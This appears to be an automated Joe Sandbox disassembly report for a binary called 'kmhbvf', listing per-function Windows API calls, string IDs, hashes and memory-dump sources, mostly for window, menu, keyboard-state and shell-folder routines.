                                                                  • Instruction ID: e038e3451d8c6ed56113a672b22131a16bfe5492ab904d437650db5e50032ee4
                                                                  • Opcode Fuzzy Hash: 9324152cd2317ed46db356337a73c45add29c5d6d6fb7cb04e4acd4f5bb25856
                                                                  • Instruction Fuzzy Hash: A511E43290510DAFCB11E7709C4AEEB77BCDF41730F1411A5F148A6191EFB4AD82EA61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 00F35535
                                                                    • Part of subcall function 00EF0859: timeGetTime.WINMM(?,00000002,00EDC22C), ref: 00EF085D
                                                                  • Sleep.KERNEL32(0000000A), ref: 00F35561
                                                                  • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00F35585
                                                                  • FindWindowExW.USER32 ref: 00F355A7
                                                                  • SetActiveWindow.USER32 ref: 00F355C6
                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F355D4
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F355F3
                                                                  • Sleep.KERNEL32(000000FA), ref: 00F355FE
                                                                  • IsWindow.USER32 ref: 00F3560A
                                                                  • EndDialog.USER32(00000000), ref: 00F3561B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                  • String ID: BUTTON
                                                                  • API String ID: 1194449130-3405671355
                                                                  • Opcode ID: 5743861d7f597426d1816e0005924de218b47692cef64260c0d20462cfef86db
                                                                  • Instruction ID: 28914b98dabc43875e9741a3454a2adc3a08c641ebc4b6d370fa62b847a5ec76
                                                                  • Opcode Fuzzy Hash: 5743861d7f597426d1816e0005924de218b47692cef64260c0d20462cfef86db
                                                                  • Instruction Fuzzy Hash: 9E21A17020464CAFE7905F60EC89B263B6AEB867B5F191025F01281171CFB1DD55BB72
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
                                                                    • Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC
                                                                  • CoInitialize.OLE32(00000000), ref: 00F3DC2D
                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F3DCC0
                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00F3DCD4
                                                                  • CoCreateInstance.OLE32(00F63D4C,00000000,00000001,00F8B86C,?), ref: 00F3DD20
                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F3DD8F
                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00F3DDE7
                                                                  • _memset.LIBCMT ref: 00F3DE24
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00F3DE60
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F3DE83
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00F3DE8A
                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F3DEC1
                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00F3DEC3
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                  • String ID:
                                                                  • API String ID: 1246142700-0
                                                                  • Opcode ID: 687abd8e59052eed4f0e6b6e53df8a48177e4f9328ff701cf69c8e82a7afb32e
                                                                  • Instruction ID: f920d9106a8f8e6abf02c73e4f58345a03a7c95b748d2b838cee219b26a858bc
                                                                  • Opcode Fuzzy Hash: 687abd8e59052eed4f0e6b6e53df8a48177e4f9328ff701cf69c8e82a7afb32e
                                                                  • Instruction Fuzzy Hash: 19B1F775A00119AFDB14DFA4D888DAEBBF9EF48314F1084A9E905EB361DB30EE41DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00F30896
                                                                  • SetKeyboardState.USER32(?), ref: 00F30901
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00F30921
                                                                  • GetKeyState.USER32 ref: 00F30938
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00F30967
                                                                  • GetKeyState.USER32 ref: 00F30978
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00F309A4
                                                                  • GetKeyState.USER32 ref: 00F309B2
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00F309DB
                                                                  • GetKeyState.USER32 ref: 00F309E9
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00F30A12
                                                                  • GetKeyState.USER32 ref: 00F30A20
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: c33e3aae49d699aebe0ccd61d8747aa041e0188aac0cbb5f7206a80dc111df43
                                                                  • Instruction ID: 4501317420b4d2a78e0a4d775011aa8fa134123f4273f72701fe4641df4f2560
                                                                  • Opcode Fuzzy Hash: c33e3aae49d699aebe0ccd61d8747aa041e0188aac0cbb5f7206a80dc111df43
                                                                  • Instruction Fuzzy Hash: 7051CA20D0578829FB35DBB088207AABFB49F013B0F08459BD5C2575C3DE689A4CDBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDlgItem.USER32 ref: 00F2CE1C
                                                                  • GetWindowRect.USER32 ref: 00F2CE2E
                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F2CE8C
                                                                  • GetDlgItem.USER32 ref: 00F2CE97
                                                                  • GetWindowRect.USER32 ref: 00F2CEA9
                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F2CEFD
                                                                  • GetDlgItem.USER32 ref: 00F2CF0B
                                                                  • GetWindowRect.USER32 ref: 00F2CF1C
                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F2CF5F
                                                                  • GetDlgItem.USER32 ref: 00F2CF6D
                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F2CF8A
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00F2CF97
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                  • String ID:
                                                                  • API String ID: 3096461208-0
                                                                  • Opcode ID: 1a2daf7394f29a450f0efa4feb4057c0c841d08662b9f0f946c38cb7abab0b0c
                                                                  • Instruction ID: 39a96c2ef1bded987c9c39743e646147b4eb0b4e1c1536995ddc136e887c3ab4
                                                                  • Opcode Fuzzy Hash: 1a2daf7394f29a450f0efa4feb4057c0c841d08662b9f0f946c38cb7abab0b0c
                                                                  • Instruction Fuzzy Hash: 98513571F00209AFDF18CF69DD95A6EBBB6EB88710F14812DF516D7290DBB1AD009B50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ED2412,?,00000000,?,?,?,?,00ED1AA7,00000000,?), ref: 00ED1F76
                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00ED24AF
                                                                  • KillTimer.USER32(-00000001,?,?,?,?,00ED1AA7,00000000,?,?,00ED1EBE,?,?), ref: 00ED254A
                                                                  • DestroyAcceleratorTable.USER32 ref: 00F0BFE7
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ED1AA7,00000000,?,?,00ED1EBE,?,?), ref: 00F0C018
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ED1AA7,00000000,?,?,00ED1EBE,?,?), ref: 00F0C02F
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ED1AA7,00000000,?,?,00ED1EBE,?,?), ref: 00F0C04B
                                                                  • DeleteObject.GDI32(00000000), ref: 00F0C05D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 641708696-0
                                                                  • Opcode ID: fcf6dfd02056f417451e24126234c2dd8c7c1b5b32cf22056a40ecb8e029642b
                                                                  • Instruction ID: e3742cf9ea32fba21600909fec4c0e396f05b3ea2373cbccca773be8dfababe0
                                                                  • Opcode Fuzzy Hash: fcf6dfd02056f417451e24126234c2dd8c7c1b5b32cf22056a40ecb8e029642b
                                                                  • Instruction Fuzzy Hash: 9E61CE30514704DFDB35AF14D948B26B7F1FF50326F20A61EE562A6AA0C771A882FF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED29AB: GetWindowLongW.USER32(?,000000EB), ref: 00ED29BC
                                                                  • GetSysColor.USER32(0000000F), ref: 00ED25AF
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ColorLongWindow
                                                                  • String ID:
                                                                  • API String ID: 259745315-0
                                                                  • Opcode ID: 0088fa14884c10d66dd2bbd9f157f7ac837dfdd036dd0aba54a138a0eb34e287
                                                                  • Instruction ID: 5ee214c4ee35fae638d69bc371c83ee2980b7c884558c5b3bc294e1dee344096
                                                                  • Opcode Fuzzy Hash: 0088fa14884c10d66dd2bbd9f157f7ac837dfdd036dd0aba54a138a0eb34e287
                                                                  • Instruction Fuzzy Hash: EC41B831404244AFDB215F289C88BB93765EB16335F18425AFE769E2E5DB708C42FB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?,00F60980), ref: 00F3AF4E
                                                                  • GetDriveTypeW.KERNEL32(00000061,00F8B5F0,00000061), ref: 00F3B018
                                                                  • _wcscpy.LIBCMT ref: 00F3B042
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                  • API String ID: 2820617543-1000479233
                                                                  • Opcode ID: aa47693747d64ffbf4d39f0e70ac395c56ec619d098fe62b7222aa26702492ff
                                                                  • Instruction ID: 399c10daf4051183429f35074d765506cec8eeb7c14835150fb28374ced25033
                                                                  • Opcode Fuzzy Hash: aa47693747d64ffbf4d39f0e70ac395c56ec619d098fe62b7222aa26702492ff
                                                                  • Instruction Fuzzy Hash: 8551CE715083099BC314EF25C891AABB7E5EF94320F14481DF5A56B2A2EB31DD09EB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __i64tow__itow__swprintf
                                                                  • String ID: %.15g$0x%p$False$True
                                                                  • API String ID: 421087845-2263619337
                                                                  • Opcode ID: a8481bec26ff6c502eef83ee27d92981b4571d803e0479009bd38585eaea3bb3
                                                                  • Instruction ID: f246e86ca7e9f20c00c471f4b07eb8b21ec729ab2e2b6a663572ef00a85f3511
                                                                  • Opcode Fuzzy Hash: a8481bec26ff6c502eef83ee27d92981b4571d803e0479009bd38585eaea3bb3
                                                                  • Instruction Fuzzy Hash: A941D7B1A0420DAFDB24DF74C842E7A73E9EB45310F2044AEE149E73D2EA319942E711
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00F5778F
                                                                  • CreateMenu.USER32 ref: 00F577AA
                                                                  • SetMenu.USER32(?,00000000), ref: 00F577B9
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F57846
                                                                  • IsMenu.USER32 ref: 00F5785C
                                                                  • CreatePopupMenu.USER32 ref: 00F57866
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F57893
                                                                  • DrawMenuBar.USER32 ref: 00F5789B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                  • String ID: 0$F
                                                                  • API String ID: 176399719-3044882817
                                                                  • Opcode ID: ac2e4497293988bfd9d8f74938935a625d8fdd459c69117c48892714792f4c82
                                                                  • Instruction ID: 818a5276b13735ac354c62789be65b9b91f820acfde6b6fce7bb8b27d5d50c8f
                                                                  • Opcode Fuzzy Hash: ac2e4497293988bfd9d8f74938935a625d8fdd459c69117c48892714792f4c82
                                                                  • Instruction Fuzzy Hash: F1414A74A01309EFDB10EF64E888A9A7BB5FF49321F280029EE16A7350C770AD14EF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F57B83
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00F57B8A
                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F57B9D
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00F57BA5
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F57BB0
                                                                  • DeleteDC.GDI32(00000000), ref: 00F57BB9
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00F57BC3
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F57BD7
                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F57BE3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                  • String ID: static
                                                                  • API String ID: 2559357485-2160076837
                                                                  • Opcode ID: c888ac7a117ddbe2a9ce052d4e8c490ade97f3f7fbd4c8486424d0f581a0488f
                                                                  • Instruction ID: fde46c11ecf34f16fbf198f0a54c0358ca508f8ca236eaf1aedd9c468c0c9944
                                                                  • Opcode Fuzzy Hash: c888ac7a117ddbe2a9ce052d4e8c490ade97f3f7fbd4c8486424d0f581a0488f
                                                                  • Instruction Fuzzy Hash: 02318F32104218BFDF11AF64DC49FDB3B69FF49321F200215FA26A61A0CB75D814EBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00EF706B
                                                                    • Part of subcall function 00EF8D58: __getptd_noexit.LIBCMT ref: 00EF8D58
                                                                  • __gmtime64_s.LIBCMT ref: 00EF7104
                                                                  • __gmtime64_s.LIBCMT ref: 00EF713A
                                                                  • __gmtime64_s.LIBCMT ref: 00EF7157
                                                                  • __allrem.LIBCMT ref: 00EF71AD
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF71C9
                                                                  • __allrem.LIBCMT ref: 00EF71E0
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF71FE
                                                                  • __allrem.LIBCMT ref: 00EF7215
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF7233
                                                                  • __invoke_watson.LIBCMT ref: 00EF72A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                  • String ID:
                                                                  • API String ID: 384356119-0
                                                                  • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                  • Instruction ID: d87c30c75456d77c2afc289579905b31d60eea8fc5f372ce7219d8f68200ff4c
                                                                  • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                  • Instruction Fuzzy Hash: 1A71E6B1A0471BABE7149E78CC41BBAB3E8AF10324F14522AF654F62C1EB74DE449790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00F32CE9
                                                                  • GetMenuItemInfoW.USER32(00F97890,000000FF,00000000,00000030), ref: 00F32D4A
                                                                  • SetMenuItemInfoW.USER32 ref: 00F32D80
                                                                  • Sleep.KERNEL32(000001F4), ref: 00F32D92
                                                                  • GetMenuItemCount.USER32 ref: 00F32DD6
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00F32DF2
                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00F32E1C
                                                                  • GetMenuItemID.USER32(?,?), ref: 00F32E61
                                                                  • CheckMenuRadioItem.USER32 ref: 00F32EA7
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F32EBB
                                                                  • SetMenuItemInfoW.USER32 ref: 00F32EDC
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                  • String ID:
                                                                  • API String ID: 4176008265-0
                                                                  • Opcode ID: 17303e8ef4fcdaa467881179be8149413be3fbd1caf03056672e299258f912c1
                                                                  • Instruction ID: 83904a2e107621fb84fec50994a21a272e46591fa36c6cf5a961ddf57664c0a3
                                                                  • Opcode Fuzzy Hash: 17303e8ef4fcdaa467881179be8149413be3fbd1caf03056672e299258f912c1
                                                                  • Instruction Fuzzy Hash: 9161D171900249AFDB50DF64CC89ABFBBB8EB40324F244059F851A7291DB71AD85FB20
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F575CA
                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F575CD
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F575F1
                                                                  • _memset.LIBCMT ref: 00F57602
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F57614
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F5768C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 830647256-0
                                                                  • Opcode ID: 48c9b81a612af40302b7a2cca5a28bed505489632edc87b9f45a308587484cf1
                                                                  • Instruction ID: 1f7df7e2d92a37d72dbb108f19379a52fb7917252a6985d931a7fd227f91e5ea
                                                                  • Opcode Fuzzy Hash: 48c9b81a612af40302b7a2cca5a28bed505489632edc87b9f45a308587484cf1
                                                                  • Instruction Fuzzy Hash: A8618B75904308AFDB10EFA4DC81EEE77F8EB09710F24019AFA15A72A1D770AD45EB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F277DD
                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00F27836
                                                                  • VariantInit.OLEAUT32(?), ref: 00F27848
